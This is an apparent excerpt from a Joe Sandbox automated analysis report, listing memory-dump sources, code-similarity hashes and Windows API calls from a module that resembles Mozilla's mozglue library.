                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: Library$AddressFreeLoadProc
                                              • String ID: NtUnmapViewOfSection$ntdll.dll
                                              • API String ID: 145871493-1050664331
                                              • Opcode ID: 044140d7758c06e1b8e496fb76e262409c8544a505b192f7a9b57ba0f479ff39
                                              • Instruction ID: 956309aa5fd99aefb19614bd5950b73b6b2990ddbb47debf145c831c88acbf8d
                                              • Opcode Fuzzy Hash: 044140d7758c06e1b8e496fb76e262409c8544a505b192f7a9b57ba0f479ff39
                                              • Instruction Fuzzy Hash: D6E092B4605701ABDF00BFAACC08B097EB9E75A39DF12C215E905D2641E7B890248B1C
                                              APIs
                                              • memset.VCRUNTIME140(?,00000000,?,?,6C52BE49), ref: 6C52BEC4
                                              • RtlCaptureStackBackTrace.NTDLL ref: 6C52BEDE
                                              • memset.VCRUNTIME140(00000000,00000000,-00000008,?,6C52BE49), ref: 6C52BF38
                                              • RtlReAllocateHeap.NTDLL ref: 6C52BF83
                                              • RtlFreeHeap.NTDLL(6C52BE49,00000000), ref: 6C52BFA6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: Heapmemset$AllocateBackCaptureFreeStackTrace
                                              • String ID:
                                              • API String ID: 2764315370-0
                                              • Opcode ID: 4d09930ef979ee78a634a6e45a9f0f06f97e7d7e57540b267679d4844b3285ca
                                              • Instruction ID: 594af60e0faad88fcd60d5f0d87bf0bb42ae198d136037acbb07c828d92b9ead
                                              • Opcode Fuzzy Hash: 4d09930ef979ee78a634a6e45a9f0f06f97e7d7e57540b267679d4844b3285ca
                                              • Instruction Fuzzy Hash: B1517F71A002158FE724DF69CD80BAAB3F2FFC8314F294629D556A7B94D734F9068B81
                                              APIs
                                              • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,?,6C50B58D,?,?,?,?,?,?,?,6C53D734,?,?,?,6C53D734), ref: 6C518E6E
                                              • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C50B58D,?,?,?,?,?,?,?,6C53D734,?,?,?,6C53D734), ref: 6C518EBF
                                              • free.MOZGLUE(?,?,?,?,6C50B58D,?,?,?,?,?,?,?,6C53D734,?,?,?), ref: 6C518F24
                                              • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C50B58D,?,?,?,?,?,?,?,6C53D734,?,?,?,6C53D734), ref: 6C518F46
                                              • free.MOZGLUE(?,?,?,?,6C50B58D,?,?,?,?,?,?,?,6C53D734,?,?,?), ref: 6C518F7A
                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C50B58D,?,?,?,?,?,?,?,6C53D734,?,?,?), ref: 6C518F8F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: freemalloc
                                              • String ID:
                                              • API String ID: 3061335427-0
                                              • Opcode ID: eb14d237604fc01269493f057a96c03623da8158e18005de1dac95cadfc25f71
                                              • Instruction ID: d7980379422c3b527d7eb0328932b4830a6bf3e21aadd21e61157d41517762e9
                                              • Opcode Fuzzy Hash: eb14d237604fc01269493f057a96c03623da8158e18005de1dac95cadfc25f71
                                              • Instruction Fuzzy Hash: F751B6B1A052158FEB24CF54DC8476E73B2FF45318F16056AD916ABB40E731F904CB92
                                              APIs
                                              • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6C512620,?,?,?,6C5060AA,6C505FCB,6C5079A3), ref: 6C51284D
                                              • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C512620,?,?,?,6C5060AA,6C505FCB,6C5079A3), ref: 6C51289A
                                              • free.MOZGLUE(?,?,?,6C512620,?,?,?,6C5060AA,6C505FCB,6C5079A3), ref: 6C5128F1
                                              • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C512620,?,?,?,6C5060AA,6C505FCB,6C5079A3), ref: 6C512910
                                              • free.MOZGLUE(00000001,?,?,6C512620,?,?,?,6C5060AA,6C505FCB,6C5079A3), ref: 6C51293C
                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(00200000,?,?,6C512620,?,?,?,6C5060AA,6C505FCB,6C5079A3), ref: 6C51294E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: freemalloc
                                              • String ID:
                                              • API String ID: 3061335427-0
                                              • Opcode ID: d5bd5957103fb2c25756ffb282ce72f0b007366e05244b946bc8f74bda63fa8e
                                              • Instruction ID: 144361e09cde223cb719cee43212834c1ee2a5f20994509638a4d4b78aaa6b66
                                              • Opcode Fuzzy Hash: d5bd5957103fb2c25756ffb282ce72f0b007366e05244b946bc8f74bda63fa8e
                                              • Instruction Fuzzy Hash: 11415EB1A082068BFB14CF68DC8876A77F6EB46308F254929D556EBB40E731E944CB91
                                              APIs
                                              • EnterCriticalSection.KERNEL32(6C54E784), ref: 6C4CCFF6
                                              • LeaveCriticalSection.KERNEL32(6C54E784), ref: 6C4CD026
                                              • VirtualAlloc.KERNEL32(00000000,00100000,00001000,00000004), ref: 6C4CD06C
                                              • VirtualFree.KERNEL32(00000000,00100000,00004000), ref: 6C4CD139
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: CriticalSectionVirtual$AllocEnterFreeLeave
                                              • String ID: MOZ_CRASH()
                                              • API String ID: 1090480015-2608361144
                                              • Opcode ID: 697eed24920a6426c437eee29395818d1b03ee45a94a39336c1b9589aaf94ddf
                                              • Instruction ID: 69890555d2361521119402ff86198a91565a18271f7d3c470a3ffa8b8496088e
                                              • Opcode Fuzzy Hash: 697eed24920a6426c437eee29395818d1b03ee45a94a39336c1b9589aaf94ddf
                                              • Instruction Fuzzy Hash: BE410375B803124FDB04EE7C8C91F6AB6B0EB49328F164239E918E7784D7B19C018BC9
                                              APIs
                                              • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C4C4E5A
                                              • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C4C4E97
                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C4C4EE9
                                              • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C4C4F02
                                              • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?), ref: 6C4C4F1E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: String$Double$Converter@double_conversion@@$Builder@2@@CreateRepresentation@$Ascii@DecimalDtoaExponentialMode@12@memcpystrlen
                                              • String ID:
                                              • API String ID: 713647276-0
                                              • Opcode ID: cc1aebe860fad18a8f1193d0f9e0e2ec8b5db99c71afd2fbc553a386b8965f3a
                                              • Instruction ID: 45d6fbd70c2cb2d0536362f3783281f40e0a082628d55509c0ea3ed8f8b4db5b
                                              • Opcode Fuzzy Hash: cc1aebe860fad18a8f1193d0f9e0e2ec8b5db99c71afd2fbc553a386b8965f3a
                                              • Instruction Fuzzy Hash: E641DF796047059FC701CF68C880E6BBBE4BF89394F109A1DF46587760D730E915CB82
                                              APIs
                                              • moz_xmalloc.MOZGLUE(-00000002,?,6C4D152B,?,?,?,?,6C4D1248,?), ref: 6C4D159C
                                              • memcpy.VCRUNTIME140(00000023,?,?,?,?,6C4D152B,?,?,?,?,6C4D1248,?), ref: 6C4D15BC
                                              • moz_xmalloc.MOZGLUE(-00000001,?,6C4D152B,?,?,?,?,6C4D1248,?), ref: 6C4D15E7
                                              • free.MOZGLUE(?,?,?,?,?,?,6C4D152B,?,?,?,?,6C4D1248,?), ref: 6C4D1606
                                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,6C4D152B,?,?,?,?,6C4D1248,?), ref: 6C4D1637
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreememcpy
                                              • String ID:
                                              • API String ID: 733145618-0
                                              • Opcode ID: ce9b7878fa5d59731cbb2c6e4601f2711504e91cf20e4737719f306e24921edc
                                              • Instruction ID: f02296216066d82135433813ad0cff1f12b68e800cd92cef591a10141ca126da
                                              • Opcode Fuzzy Hash: ce9b7878fa5d59731cbb2c6e4601f2711504e91cf20e4737719f306e24921edc
                                              • Instruction Fuzzy Hash: 9F31D871A001148BC714EE78D860C6E77E5AB853747260B6DEC27DBBD4EB30F9058791
                                              APIs
                                              • moz_xmalloc.MOZGLUE(00000000,?,00000000,?,?,6C53E330,?,6C4EC059), ref: 6C52AD9D
                                                • Part of subcall function 6C4DCA10: malloc.MOZGLUE(?), ref: 6C4DCA26
                                              • memset.VCRUNTIME140(00000000,00000000,00000000,00000000,?,?,6C53E330,?,6C4EC059), ref: 6C52ADAC
                                              • free.MOZGLUE(?,?,?,?,00000000,?,?,6C53E330,?,6C4EC059), ref: 6C52AE01
                                              • GetLastError.KERNEL32(?,00000000,?,?,6C53E330,?,6C4EC059), ref: 6C52AE1D
                                              • GetLastError.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,?,?,6C53E330,?,6C4EC059), ref: 6C52AE3D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: ErrorLast$freemallocmemsetmoz_xmalloc
                                              • String ID:
                                              • API String ID: 3161513745-0
                                              • Opcode ID: 3c73dc2bacc93bc4e8e8c0354dc2072d7b66435612cf97a233c85f7fb1a1bd6e
                                              • Instruction ID: ae7e42f7fed60a0c6b231d3d843fd87ee57a167059fca6c3d6d25d90574acce3
                                              • Opcode Fuzzy Hash: 3c73dc2bacc93bc4e8e8c0354dc2072d7b66435612cf97a233c85f7fb1a1bd6e
                                              • Instruction Fuzzy Hash: C73121B1A002259FDB14DF798C44AABB7F8EF89614F15882DE85AD7740E734A805CBA4
                                              APIs
                                              • ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP140(00000001,00000000,6C53DCA0,?,?,?,6C4FE8B5,00000000), ref: 6C525F1F
                                              • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C4FE8B5,00000000), ref: 6C525F4B
                                              • ?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(00000000,?,6C4FE8B5,00000000), ref: 6C525F7B
                                              • ?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(6E65475B,00000000,?,6C4FE8B5,00000000), ref: 6C525F9F
                                              • ?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C4FE8B5,00000000), ref: 6C525FD6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@?sbumpc@?$basic_streambuf@?sgetc@?$basic_streambuf@?snextc@?$basic_streambuf@Ipfx@?$basic_istream@
                                              • String ID:
                                              • API String ID: 1389714915-0
                                              • Opcode ID: f0d73fa2e877ff05fbf0083f59ff6ebbc866e705ec86b3b7a05c7c8484befb9a
                                              • Instruction ID: 708653275427d40cbb3bab2173fe114d9d3e84d82a41d0041d0245715d29bdeb
                                              • Opcode Fuzzy Hash: f0d73fa2e877ff05fbf0083f59ff6ebbc866e705ec86b3b7a05c7c8484befb9a
                                              • Instruction Fuzzy Hash: F531FC74300A008FD724DF29C898E2AB7F9FF89319BA58558E55687B99D735EC41CB80
                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000), ref: 6C4CB532
                                              • moz_xmalloc.MOZGLUE(?), ref: 6C4CB55B
                                              • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C4CB56B
                                              • wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6C4CB57E
                                              • free.MOZGLUE(00000000), ref: 6C4CB58F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
                                              • String ID:
                                              • API String ID: 4244350000-0
                                              • Opcode ID: a60f544696c22e65dab9c8376edd0fc633b19f7cb7edd3268d2150ce7ae9f630
                                              • Instruction ID: d7949ee460512f339431f4ed6efe08e9a8c4d3dcafa9a2ed15955abaa7f05242
                                              • Opcode Fuzzy Hash: a60f544696c22e65dab9c8376edd0fc633b19f7cb7edd3268d2150ce7ae9f630
                                              • Instruction Fuzzy Hash: 8E21E175A002159BDB00DF68CC40FAABBB9FF86318F684129E818DB351E736D911CBA1
                                              APIs
                                              • ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6C4CB7CF
                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6C4CB808
                                              • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6C4CB82C
                                              • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C4CB840
                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C4CB849
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: free$?vprint@PrintfTarget@mozilla@@mallocmemcpy
                                              • String ID:
                                              • API String ID: 1977084945-0
                                              • Opcode ID: cd3c55bd89b9b85c5dde72f6eac473baa87daa77c0b573a9c63a882aa0701fbc
                                              • Instruction ID: 1c74989288ccd42dbc2d550e77f118f971d5d23984db55219f9ee44c82d581a3
                                              • Opcode Fuzzy Hash: cd3c55bd89b9b85c5dde72f6eac473baa87daa77c0b573a9c63a882aa0701fbc
                                              • Instruction Fuzzy Hash: 63216DB4E002199FDF04DFA9C8859FEBBB4EF49318F148129EC19A7340E731A944CBA1
                                              APIs
                                              • MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6C526E78
                                                • Part of subcall function 6C526A10: InitializeCriticalSection.KERNEL32(6C54F618), ref: 6C526A68
                                                • Part of subcall function 6C526A10: GetCurrentProcess.KERNEL32 ref: 6C526A7D
                                                • Part of subcall function 6C526A10: GetCurrentProcess.KERNEL32 ref: 6C526AA1
                                                • Part of subcall function 6C526A10: EnterCriticalSection.KERNEL32(6C54F618), ref: 6C526AAE
                                                • Part of subcall function 6C526A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C526AE1
                                                • Part of subcall function 6C526A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C526B15
                                                • Part of subcall function 6C526A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6C526B65
                                                • Part of subcall function 6C526A10: LeaveCriticalSection.KERNEL32(6C54F618,?,?), ref: 6C526B83
                                              • MozFormatCodeAddress.MOZGLUE ref: 6C526EC1
                                              • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C526EE1
                                              • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C526EED
                                              • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000400), ref: 6C526EFF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: CriticalSectionstrncpy$AddressCodeCurrentProcess$DescribeEnterFormatInitializeLeave_fileno_writefflush
                                              • String ID:
                                              • API String ID: 4058739482-0
                                              • Opcode ID: a7ab5ad364db8a82a80ed787e777787be51c55e10ed4ababe53f5425c6d1e4f0
                                              • Instruction ID: 4995f59d1af026b4709b54246383679e13f53cb59bd7da0242cdf11150e824f7
                                              • Opcode Fuzzy Hash: a7ab5ad364db8a82a80ed787e777787be51c55e10ed4ababe53f5425c6d1e4f0
                                              • Instruction Fuzzy Hash: 09219071A0431A9FDF10DF69DC85A9E77F5EF84308F048079E80D97281EB749A598F92
                                              APIs
                                              • VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6C4C3DEF), ref: 6C500D71
                                              • VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6C4C3DEF), ref: 6C500D84
                                              • VirtualFree.KERNEL32(00000000,00000000,00008000,?,6C4C3DEF), ref: 6C500DAF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: Virtual$Free$Alloc
                                              • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                              • API String ID: 1852963964-2186867486
                                              • Opcode ID: eb3675510e1c0b435f1aa9dd0af9319625ff44f44084b2d633ac5b843fb8efbe
                                              • Instruction ID: 1fea8b829a6e1fe314e25f116f6763acea1f96b6b9a02714b11ac5d8323bdee4
                                              • Opcode Fuzzy Hash: eb3675510e1c0b435f1aa9dd0af9319625ff44f44084b2d633ac5b843fb8efbe
                                              • Instruction Fuzzy Hash: 65F0543238079432E62429665C0AB6A269D67C2B65F25C527F608DA9C0DB70E800C6B9
                                              APIs
                                              • WaitForSingleObject.KERNEL32(000000FF), ref: 6C52586C
                                              • CloseHandle.KERNEL32 ref: 6C525878
                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C525898
                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C5258C9
                                              • free.MOZGLUE(00000000), ref: 6C5258D3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: free$CloseHandleObjectSingleWait
                                              • String ID:
                                              • API String ID: 1910681409-0
                                              • Opcode ID: 9d8d96196e7ae5c57f31fab74f7d90a43e32fa4145c2322ed465c15e71d15a38
                                              • Instruction ID: 09990d4ea1d9b4eb0ca27d3da8914e3b1c29c25221b5a83b72f96fb406a0b640
                                              • Opcode Fuzzy Hash: 9d8d96196e7ae5c57f31fab74f7d90a43e32fa4145c2322ed465c15e71d15a38
                                              • Instruction Fuzzy Hash: 44016271704101ABDF00FF2EDC08A867BF8EB8332D766C275E519D2256D77198148F99
                                              APIs
                                              • moz_xmalloc.MOZGLUE(0000002C,?,?,?,?,6C5175C4,?), ref: 6C51762B
                                                • Part of subcall function 6C4DCA10: malloc.MOZGLUE(?), ref: 6C4DCA26
                                              • InitializeConditionVariable.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,6C5174D7,6C5215FC,?,?,?), ref: 6C517644
                                              • GetCurrentThreadId.KERNEL32 ref: 6C51765A
                                              • AcquireSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C5174D7,6C5215FC,?,?,?), ref: 6C517663
                                              • ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C5174D7,6C5215FC,?,?,?), ref: 6C517677
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: ExclusiveLock$AcquireConditionCurrentInitializeReleaseThreadVariablemallocmoz_xmalloc
                                              • String ID:
                                              • API String ID: 418114769-0
                                              • Opcode ID: 127c2698c6e494351747083910e00a387e4f1e732094895b2a7ed3562022bd8b
                                              • Instruction ID: 964c2f6097e17ce8db41ec24ff6f2427ed40d5ee1afa7662d6044deb3b4ed62d
                                              • Opcode Fuzzy Hash: 127c2698c6e494351747083910e00a387e4f1e732094895b2a7ed3562022bd8b
                                              • Instruction Fuzzy Hash: 4CF0A471E10745ABD700AF21CC48A79B778FFEA359F128356F90442601E7B1A5E087D1
                                              APIs
                                              • __Init_thread_footer.LIBCMT ref: 6C521800
                                                • Part of subcall function 6C4FCBE8: GetCurrentProcess.KERNEL32(?,6C4C31A7), ref: 6C4FCBF1
                                                • Part of subcall function 6C4FCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C4C31A7), ref: 6C4FCBFA
                                                • Part of subcall function 6C4C4290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C503EBD,6C503EBD,00000000), ref: 6C4C42A9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
